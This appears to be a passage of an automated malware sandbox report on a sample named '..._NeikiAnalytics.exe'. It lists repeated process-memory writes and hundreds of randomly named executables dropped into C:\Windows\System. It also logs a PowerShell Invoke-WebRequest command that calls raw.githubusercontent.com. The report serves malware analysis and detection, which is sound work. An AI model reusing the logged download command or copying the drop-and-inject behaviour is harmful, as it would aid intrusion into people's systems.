PID 2040 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\eXogIyX.exe
PID 2040 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\mCNwbnq.exe
PID 2040 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\mCNwbnq.exe
PID 2040 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\mCNwbnq.exe
PID 2040 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\zoUXHGE.exe
PID 2040 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\zoUXHGE.exe
PID 2040 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\zoUXHGE.exe
PID 2040 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\PsTqftB.exe
PID 2040 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\PsTqftB.exe
PID 2040 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\PsTqftB.exe
PID 2040 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\fHAoOSG.exe
PID 2040 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\fHAoOSG.exe
PID 2040 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\fHAoOSG.exe
PID 2040 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\LfHGfqB.exe
PID 2040 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\LfHGfqB.exe
PID 2040 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\LfHGfqB.exe
PID 2040 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\JgTbNdc.exe
PID 2040 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\JgTbNdc.exe
PID 2040 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\JgTbNdc.exe
PID 2040 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\EtFmAcE.exe
PID 2040 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\EtFmAcE.exe
PID 2040 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\EtFmAcE.exe
PID 2040 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\GujXmeB.exe
PID 2040 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\GujXmeB.exe
PID 2040 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\GujXmeB.exe
PID 2040 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\QoMimGa.exe
PID 2040 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\QoMimGa.exe
PID 2040 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\QoMimGa.exe
PID 2040 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\pCPQzdl.exe
PID 2040 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\pCPQzdl.exe
PID 2040 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\pCPQzdl.exe
PID 2040 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\wxCpkpj.exe
PID 2040 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\wxCpkpj.exe
PID 2040 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\wxCpkpj.exe
PID 2040 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\GQckUAj.exe
PID 2040 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\GQckUAj.exe
PID 2040 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\GQckUAj.exe
PID 2040 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\FfrtHjS.exe
PID 2040 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\FfrtHjS.exe
PID 2040 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\FfrtHjS.exe
PID 2040 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\CeemIxU.exe
PID 2040 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\CeemIxU.exe
PID 2040 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\CeemIxU.exe
PID 2040 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\twBhife.exe
PID 2040 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\twBhife.exe
PID 2040 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\twBhife.exe
PID 2040 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\sXmCKGJ.exe
PID 2040 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\sXmCKGJ.exe
PID 2040 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\sXmCKGJ.exe
PID 2040 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\BxqKKjn.exe
PID 2040 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\BxqKKjn.exe
PID 2040 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\BxqKKjn.exe
PID 2040 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\iDYIyrC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\AnfHbgG.exe

C:\Windows\System\AnfHbgG.exe

C:\Windows\System\owsTsek.exe

C:\Windows\System\owsTsek.exe

C:\Windows\System\eXogIyX.exe

C:\Windows\System\eXogIyX.exe

C:\Windows\System\mCNwbnq.exe

C:\Windows\System\mCNwbnq.exe

C:\Windows\System\zoUXHGE.exe

C:\Windows\System\zoUXHGE.exe

C:\Windows\System\PsTqftB.exe

C:\Windows\System\PsTqftB.exe

C:\Windows\System\fHAoOSG.exe

C:\Windows\System\fHAoOSG.exe

C:\Windows\System\LfHGfqB.exe

C:\Windows\System\LfHGfqB.exe

C:\Windows\System\JgTbNdc.exe

C:\Windows\System\JgTbNdc.exe

C:\Windows\System\EtFmAcE.exe

C:\Windows\System\EtFmAcE.exe

C:\Windows\System\GujXmeB.exe

C:\Windows\System\GujXmeB.exe

C:\Windows\System\QoMimGa.exe

C:\Windows\System\QoMimGa.exe

C:\Windows\System\pCPQzdl.exe

C:\Windows\System\pCPQzdl.exe

C:\Windows\System\wxCpkpj.exe

C:\Windows\System\wxCpkpj.exe

C:\Windows\System\GQckUAj.exe

C:\Windows\System\GQckUAj.exe

C:\Windows\System\FfrtHjS.exe

C:\Windows\System\FfrtHjS.exe

C:\Windows\System\CeemIxU.exe

C:\Windows\System\CeemIxU.exe

C:\Windows\System\twBhife.exe

C:\Windows\System\twBhife.exe

C:\Windows\System\sXmCKGJ.exe

C:\Windows\System\sXmCKGJ.exe

C:\Windows\System\BxqKKjn.exe

C:\Windows\System\BxqKKjn.exe

C:\Windows\System\iDYIyrC.exe

C:\Windows\System\iDYIyrC.exe

C:\Windows\System\lkrNRcv.exe

C:\Windows\System\lkrNRcv.exe

C:\Windows\System\MbcGyDC.exe

C:\Windows\System\MbcGyDC.exe

C:\Windows\System\HUagQUk.exe

C:\Windows\System\HUagQUk.exe

C:\Windows\System\NdEjRIZ.exe

C:\Windows\System\NdEjRIZ.exe

C:\Windows\System\wPEjBHG.exe

C:\Windows\System\wPEjBHG.exe

C:\Windows\System\Ylydjqo.exe

C:\Windows\System\Ylydjqo.exe

C:\Windows\System\FgPswQg.exe

C:\Windows\System\FgPswQg.exe

C:\Windows\System\yrmfvbe.exe

C:\Windows\System\yrmfvbe.exe

C:\Windows\System\yMEECiQ.exe

C:\Windows\System\yMEECiQ.exe

C:\Windows\System\UjIBrcH.exe

C:\Windows\System\UjIBrcH.exe

C:\Windows\System\JGnUHnm.exe

C:\Windows\System\JGnUHnm.exe

C:\Windows\System\sjWpTAq.exe

C:\Windows\System\sjWpTAq.exe

C:\Windows\System\xDaBvJd.exe

C:\Windows\System\xDaBvJd.exe

C:\Windows\System\rRfBZuB.exe

C:\Windows\System\rRfBZuB.exe

C:\Windows\System\YYDrhEA.exe

C:\Windows\System\YYDrhEA.exe

C:\Windows\System\bsujjfH.exe

C:\Windows\System\bsujjfH.exe

C:\Windows\System\CQjGAsF.exe

C:\Windows\System\CQjGAsF.exe

C:\Windows\System\eUPoQiD.exe

C:\Windows\System\eUPoQiD.exe

C:\Windows\System\ccFKPOh.exe

C:\Windows\System\ccFKPOh.exe

C:\Windows\System\hDBPigV.exe

C:\Windows\System\hDBPigV.exe

C:\Windows\System\VzLcBEM.exe

C:\Windows\System\VzLcBEM.exe

C:\Windows\System\UzlVdGz.exe

C:\Windows\System\UzlVdGz.exe

C:\Windows\System\KOXCViW.exe

C:\Windows\System\KOXCViW.exe

C:\Windows\System\yYftVVC.exe

C:\Windows\System\yYftVVC.exe

C:\Windows\System\ZTOLzJI.exe

C:\Windows\System\ZTOLzJI.exe

C:\Windows\System\gCrppZa.exe

C:\Windows\System\gCrppZa.exe

C:\Windows\System\AAgDeVs.exe

C:\Windows\System\AAgDeVs.exe

C:\Windows\System\kAGLSmM.exe

C:\Windows\System\kAGLSmM.exe

C:\Windows\System\JFSYXbF.exe

C:\Windows\System\JFSYXbF.exe

C:\Windows\System\VHOFmHS.exe

C:\Windows\System\VHOFmHS.exe

C:\Windows\System\ayreXaa.exe

C:\Windows\System\ayreXaa.exe

C:\Windows\System\JQbBOgN.exe

C:\Windows\System\JQbBOgN.exe

C:\Windows\System\TipIUwj.exe

C:\Windows\System\TipIUwj.exe

C:\Windows\System\nfrOFFx.exe

C:\Windows\System\nfrOFFx.exe

C:\Windows\System\KqAsbVL.exe

C:\Windows\System\KqAsbVL.exe

C:\Windows\System\YNMJoSy.exe

C:\Windows\System\YNMJoSy.exe

C:\Windows\System\MszExGN.exe

C:\Windows\System\MszExGN.exe

C:\Windows\System\wGlbRCV.exe

C:\Windows\System\wGlbRCV.exe

C:\Windows\System\NKdSxoQ.exe

C:\Windows\System\NKdSxoQ.exe

C:\Windows\System\ZbzMgRZ.exe

C:\Windows\System\ZbzMgRZ.exe

C:\Windows\System\MRpCmAM.exe

C:\Windows\System\MRpCmAM.exe

C:\Windows\System\oDFNSCe.exe

C:\Windows\System\oDFNSCe.exe

C:\Windows\System\yohaepY.exe

C:\Windows\System\yohaepY.exe

C:\Windows\System\FEZacsb.exe

C:\Windows\System\FEZacsb.exe

C:\Windows\System\vuMdHrX.exe

C:\Windows\System\vuMdHrX.exe

C:\Windows\System\uaIYgAf.exe

C:\Windows\System\uaIYgAf.exe

C:\Windows\System\WHeBlVS.exe

C:\Windows\System\WHeBlVS.exe

C:\Windows\System\TccFLGT.exe

C:\Windows\System\TccFLGT.exe

C:\Windows\System\PJLqnix.exe

C:\Windows\System\PJLqnix.exe

C:\Windows\System\xBVryRT.exe

C:\Windows\System\xBVryRT.exe

C:\Windows\System\EzWVTut.exe

C:\Windows\System\EzWVTut.exe

C:\Windows\System\QYkQRzf.exe

C:\Windows\System\QYkQRzf.exe

C:\Windows\System\JxngQjm.exe

C:\Windows\System\JxngQjm.exe

C:\Windows\System\CPTBmpC.exe

C:\Windows\System\CPTBmpC.exe

C:\Windows\System\MgJcoOl.exe

C:\Windows\System\MgJcoOl.exe

C:\Windows\System\MaIEuII.exe

C:\Windows\System\MaIEuII.exe

C:\Windows\System\IPsCEqb.exe

C:\Windows\System\IPsCEqb.exe

C:\Windows\System\MLVjhsP.exe

C:\Windows\System\MLVjhsP.exe

C:\Windows\System\savBtvh.exe

C:\Windows\System\savBtvh.exe

C:\Windows\System\xqNikhP.exe

C:\Windows\System\xqNikhP.exe

C:\Windows\System\PrPbsHO.exe

C:\Windows\System\PrPbsHO.exe

C:\Windows\System\lFCHXtS.exe

C:\Windows\System\lFCHXtS.exe

C:\Windows\System\qPCKIHn.exe

C:\Windows\System\qPCKIHn.exe

C:\Windows\System\jGExwlu.exe

C:\Windows\System\jGExwlu.exe

C:\Windows\System\rbIVvdd.exe

C:\Windows\System\rbIVvdd.exe

C:\Windows\System\xMjbKgJ.exe

C:\Windows\System\xMjbKgJ.exe

C:\Windows\System\DomerIi.exe

C:\Windows\System\DomerIi.exe

C:\Windows\System\rRgVELe.exe

C:\Windows\System\rRgVELe.exe

C:\Windows\System\QJpBdus.exe

C:\Windows\System\QJpBdus.exe

C:\Windows\System\LkgEadE.exe

C:\Windows\System\LkgEadE.exe

C:\Windows\System\cXPwJWa.exe

C:\Windows\System\cXPwJWa.exe

C:\Windows\System\jZCGULU.exe

C:\Windows\System\jZCGULU.exe

C:\Windows\System\iiBiOBj.exe

C:\Windows\System\iiBiOBj.exe

C:\Windows\System\UkPlqUN.exe

C:\Windows\System\UkPlqUN.exe

C:\Windows\System\RBfmWwW.exe

C:\Windows\System\RBfmWwW.exe

C:\Windows\System\PrwnLrF.exe

C:\Windows\System\PrwnLrF.exe

C:\Windows\System\XIQAYbK.exe

C:\Windows\System\XIQAYbK.exe

C:\Windows\System\GERFMBT.exe

C:\Windows\System\GERFMBT.exe

C:\Windows\System\OIxHmyV.exe

C:\Windows\System\OIxHmyV.exe

C:\Windows\System\kWRrFam.exe

C:\Windows\System\kWRrFam.exe

C:\Windows\System\ALgMjwu.exe

C:\Windows\System\ALgMjwu.exe

C:\Windows\System\cWFVdbb.exe

C:\Windows\System\cWFVdbb.exe

C:\Windows\System\wLtBzfX.exe

C:\Windows\System\wLtBzfX.exe

C:\Windows\System\YwVJSuG.exe

C:\Windows\System\YwVJSuG.exe

C:\Windows\System\zckvTZD.exe

C:\Windows\System\zckvTZD.exe

C:\Windows\System\cGUeGkl.exe

C:\Windows\System\cGUeGkl.exe

C:\Windows\System\ebvSnss.exe

C:\Windows\System\ebvSnss.exe

C:\Windows\System\LMORMOg.exe

C:\Windows\System\LMORMOg.exe

C:\Windows\System\pWDRUoQ.exe

C:\Windows\System\pWDRUoQ.exe

C:\Windows\System\bsxbsYH.exe

C:\Windows\System\bsxbsYH.exe

C:\Windows\System\PtjOGfk.exe

C:\Windows\System\PtjOGfk.exe

C:\Windows\System\hvhuxuc.exe

C:\Windows\System\hvhuxuc.exe

C:\Windows\System\tLmtMLL.exe

C:\Windows\System\tLmtMLL.exe

C:\Windows\System\YdMhPrx.exe

C:\Windows\System\YdMhPrx.exe

C:\Windows\System\wnPsYDK.exe

C:\Windows\System\wnPsYDK.exe

C:\Windows\System\ANrXOFJ.exe

C:\Windows\System\ANrXOFJ.exe

C:\Windows\System\armHxQa.exe

C:\Windows\System\armHxQa.exe

C:\Windows\System\cAYECAv.exe

C:\Windows\System\cAYECAv.exe

C:\Windows\System\RKOXJdL.exe

C:\Windows\System\RKOXJdL.exe

C:\Windows\System\aVecYaq.exe

C:\Windows\System\aVecYaq.exe

C:\Windows\System\VITbXLz.exe

C:\Windows\System\VITbXLz.exe

C:\Windows\System\EiyTyMW.exe

C:\Windows\System\EiyTyMW.exe

C:\Windows\System\QqHvHHt.exe

C:\Windows\System\QqHvHHt.exe

C:\Windows\System\FQLnNlN.exe

C:\Windows\System\FQLnNlN.exe

C:\Windows\System\PXwVHlz.exe

C:\Windows\System\PXwVHlz.exe

C:\Windows\System\hnhsLep.exe

C:\Windows\System\hnhsLep.exe

C:\Windows\System\vBxmnZZ.exe

C:\Windows\System\vBxmnZZ.exe

C:\Windows\System\yTbPgGP.exe

C:\Windows\System\yTbPgGP.exe

C:\Windows\System\cTPAgpW.exe

C:\Windows\System\cTPAgpW.exe

C:\Windows\System\YFjsvUw.exe

C:\Windows\System\YFjsvUw.exe

C:\Windows\System\fqDNcWo.exe

C:\Windows\System\fqDNcWo.exe

C:\Windows\System\JmOrHrK.exe

C:\Windows\System\JmOrHrK.exe

C:\Windows\System\WawvQlw.exe

C:\Windows\System\WawvQlw.exe

C:\Windows\System\TsGhwUm.exe

C:\Windows\System\TsGhwUm.exe

C:\Windows\System\bKzZqMt.exe

C:\Windows\System\bKzZqMt.exe

C:\Windows\System\Wuajark.exe

C:\Windows\System\Wuajark.exe

C:\Windows\System\IQLeQKd.exe

C:\Windows\System\IQLeQKd.exe

C:\Windows\System\TQpcoBA.exe

C:\Windows\System\TQpcoBA.exe

C:\Windows\System\sNYxHYO.exe

C:\Windows\System\sNYxHYO.exe

C:\Windows\System\EiZUsBQ.exe

C:\Windows\System\EiZUsBQ.exe

C:\Windows\System\MHvoTPP.exe

C:\Windows\System\MHvoTPP.exe

C:\Windows\System\NTgZrKm.exe

C:\Windows\System\NTgZrKm.exe

C:\Windows\System\VlFlaXF.exe

C:\Windows\System\VlFlaXF.exe

C:\Windows\System\YDMvqUg.exe

C:\Windows\System\YDMvqUg.exe

C:\Windows\System\GIHkEUM.exe

C:\Windows\System\GIHkEUM.exe

C:\Windows\System\vqYUnOv.exe

C:\Windows\System\vqYUnOv.exe

C:\Windows\System\WSzAYbR.exe

C:\Windows\System\WSzAYbR.exe

C:\Windows\System\jdPRiFa.exe

C:\Windows\System\jdPRiFa.exe

C:\Windows\System\kPizLdO.exe

C:\Windows\System\kPizLdO.exe

C:\Windows\System\drCiIsf.exe

C:\Windows\System\drCiIsf.exe

C:\Windows\System\MMRtJNR.exe

C:\Windows\System\MMRtJNR.exe

C:\Windows\System\wywSQda.exe

C:\Windows\System\wywSQda.exe

C:\Windows\System\blcnFSS.exe

C:\Windows\System\blcnFSS.exe

C:\Windows\System\MeJaUSq.exe

C:\Windows\System\MeJaUSq.exe

C:\Windows\System\mQrrDOm.exe

C:\Windows\System\mQrrDOm.exe

C:\Windows\System\SJnVGLB.exe

C:\Windows\System\SJnVGLB.exe

C:\Windows\System\sACmAkG.exe

C:\Windows\System\sACmAkG.exe

C:\Windows\System\jWiPGvN.exe

C:\Windows\System\jWiPGvN.exe

C:\Windows\System\ubnApzH.exe

C:\Windows\System\ubnApzH.exe

C:\Windows\System\hwbHeNS.exe

C:\Windows\System\hwbHeNS.exe

C:\Windows\System\PJsmemz.exe

C:\Windows\System\PJsmemz.exe

C:\Windows\System\TSNNXpi.exe

C:\Windows\System\TSNNXpi.exe

C:\Windows\System\wReGMyR.exe

C:\Windows\System\wReGMyR.exe

C:\Windows\System\uKKDOhq.exe

C:\Windows\System\uKKDOhq.exe

C:\Windows\System\tPNdXrX.exe

C:\Windows\System\tPNdXrX.exe

C:\Windows\System\iqdvMDZ.exe

C:\Windows\System\iqdvMDZ.exe

C:\Windows\System\WmItKti.exe

C:\Windows\System\WmItKti.exe

C:\Windows\System\aOFNlUb.exe

C:\Windows\System\aOFNlUb.exe

C:\Windows\System\DRsnsru.exe

C:\Windows\System\DRsnsru.exe

C:\Windows\System\ngJuHTo.exe

C:\Windows\System\ngJuHTo.exe

C:\Windows\System\dUnMvUp.exe

C:\Windows\System\dUnMvUp.exe

C:\Windows\System\KjQxaje.exe

C:\Windows\System\KjQxaje.exe

C:\Windows\System\hqQYfGb.exe

C:\Windows\System\hqQYfGb.exe

C:\Windows\System\meskZKj.exe

C:\Windows\System\meskZKj.exe

C:\Windows\System\UNxcYfw.exe

C:\Windows\System\UNxcYfw.exe

C:\Windows\System\pGhaWkz.exe

C:\Windows\System\pGhaWkz.exe

C:\Windows\System\XYIroRr.exe

C:\Windows\System\XYIroRr.exe

C:\Windows\System\ZijeaEQ.exe

C:\Windows\System\ZijeaEQ.exe

C:\Windows\System\ysstjue.exe

C:\Windows\System\ysstjue.exe

C:\Windows\System\IVxpdne.exe

C:\Windows\System\IVxpdne.exe

C:\Windows\System\NxYogwY.exe

C:\Windows\System\NxYogwY.exe

C:\Windows\System\VLVQkFw.exe

C:\Windows\System\VLVQkFw.exe

C:\Windows\System\JpupTHE.exe

C:\Windows\System\JpupTHE.exe

C:\Windows\System\HPgaNWl.exe

C:\Windows\System\HPgaNWl.exe

C:\Windows\System\gWRjwih.exe

C:\Windows\System\gWRjwih.exe

C:\Windows\System\KyKAWns.exe

C:\Windows\System\KyKAWns.exe

C:\Windows\System\Cbdzaxk.exe

C:\Windows\System\Cbdzaxk.exe

C:\Windows\System\WYueyxR.exe

C:\Windows\System\WYueyxR.exe

C:\Windows\System\aeXmZpw.exe

C:\Windows\System\aeXmZpw.exe

C:\Windows\System\icoNetS.exe

C:\Windows\System\icoNetS.exe

C:\Windows\System\KYAmcHa.exe

C:\Windows\System\KYAmcHa.exe

C:\Windows\System\OfeaVnJ.exe

C:\Windows\System\OfeaVnJ.exe

C:\Windows\System\TCtXKEe.exe

C:\Windows\System\TCtXKEe.exe

C:\Windows\System\UqIUqgB.exe

C:\Windows\System\UqIUqgB.exe

C:\Windows\System\LexKRml.exe

C:\Windows\System\LexKRml.exe

C:\Windows\System\sUGFbRi.exe

C:\Windows\System\sUGFbRi.exe

C:\Windows\System\FhKSDAe.exe

C:\Windows\System\FhKSDAe.exe

C:\Windows\System\dMzEMhg.exe

C:\Windows\System\dMzEMhg.exe

C:\Windows\System\ggnctPq.exe

C:\Windows\System\ggnctPq.exe

C:\Windows\System\EwRoBnQ.exe

C:\Windows\System\EwRoBnQ.exe

C:\Windows\System\dKKcYHx.exe

C:\Windows\System\dKKcYHx.exe

C:\Windows\System\eXZKzWz.exe

C:\Windows\System\eXZKzWz.exe

C:\Windows\System\zIyArSa.exe

C:\Windows\System\zIyArSa.exe

C:\Windows\System\moXIGog.exe

C:\Windows\System\moXIGog.exe

C:\Windows\System\knrJCrN.exe

C:\Windows\System\knrJCrN.exe

C:\Windows\System\eozgqAX.exe

C:\Windows\System\eozgqAX.exe

C:\Windows\System\niaFOxh.exe

C:\Windows\System\niaFOxh.exe

C:\Windows\System\itxDxuE.exe

C:\Windows\System\itxDxuE.exe

C:\Windows\System\vBzGNPl.exe

C:\Windows\System\vBzGNPl.exe

C:\Windows\System\XjxJizw.exe

C:\Windows\System\XjxJizw.exe

C:\Windows\System\uWYMhuF.exe

C:\Windows\System\uWYMhuF.exe

C:\Windows\System\sCspDdn.exe

C:\Windows\System\sCspDdn.exe

C:\Windows\System\ZcJfYpZ.exe

C:\Windows\System\ZcJfYpZ.exe

C:\Windows\System\meGzjcH.exe

C:\Windows\System\meGzjcH.exe

C:\Windows\System\virDTDo.exe

C:\Windows\System\virDTDo.exe

C:\Windows\System\tggczqs.exe

C:\Windows\System\tggczqs.exe

C:\Windows\System\SJSdVDs.exe

C:\Windows\System\SJSdVDs.exe

C:\Windows\System\CfgtDjA.exe

C:\Windows\System\CfgtDjA.exe

C:\Windows\System\IVczXqM.exe

C:\Windows\System\IVczXqM.exe

C:\Windows\System\KgMorMY.exe

C:\Windows\System\KgMorMY.exe

C:\Windows\System\DsksTlK.exe

C:\Windows\System\DsksTlK.exe

C:\Windows\System\OambQqY.exe

C:\Windows\System\OambQqY.exe

C:\Windows\System\qowSvDd.exe

C:\Windows\System\qowSvDd.exe

C:\Windows\System\jyaZxqN.exe

C:\Windows\System\jyaZxqN.exe

C:\Windows\System\kQvNjdl.exe

C:\Windows\System\kQvNjdl.exe

C:\Windows\System\CPYJaya.exe

C:\Windows\System\CPYJaya.exe

C:\Windows\System\KUNesOH.exe

C:\Windows\System\KUNesOH.exe

C:\Windows\System\LGOgkGK.exe

C:\Windows\System\LGOgkGK.exe

C:\Windows\System\KoqsIBy.exe

C:\Windows\System\KoqsIBy.exe

C:\Windows\System\brpAMOe.exe

C:\Windows\System\brpAMOe.exe

C:\Windows\System\ZXhgsNt.exe

C:\Windows\System\ZXhgsNt.exe

C:\Windows\System\QNazMeC.exe

C:\Windows\System\QNazMeC.exe

C:\Windows\System\gYaXSya.exe

C:\Windows\System\gYaXSya.exe

C:\Windows\System\KZZnnGP.exe

C:\Windows\System\KZZnnGP.exe

C:\Windows\System\sXhAIDA.exe

C:\Windows\System\sXhAIDA.exe

C:\Windows\System\bdURwic.exe

C:\Windows\System\bdURwic.exe

C:\Windows\System\gLGWIAp.exe

C:\Windows\System\gLGWIAp.exe

C:\Windows\System\ROLiPAK.exe

C:\Windows\System\ROLiPAK.exe

C:\Windows\System\PQZyrXo.exe

C:\Windows\System\PQZyrXo.exe

C:\Windows\System\NDqdwaI.exe

C:\Windows\System\NDqdwaI.exe

C:\Windows\System\HAMJNBD.exe

C:\Windows\System\HAMJNBD.exe

C:\Windows\System\QCCrebs.exe

C:\Windows\System\QCCrebs.exe

C:\Windows\System\MXiEPsH.exe

C:\Windows\System\MXiEPsH.exe

C:\Windows\System\iAlggqT.exe

C:\Windows\System\iAlggqT.exe

C:\Windows\System\YtTTMTY.exe

C:\Windows\System\YtTTMTY.exe

C:\Windows\System\lIfSgCc.exe

C:\Windows\System\lIfSgCc.exe

C:\Windows\System\mzRUltd.exe

C:\Windows\System\mzRUltd.exe

C:\Windows\System\LFjmBtf.exe

C:\Windows\System\LFjmBtf.exe

C:\Windows\System\hzuTuFA.exe

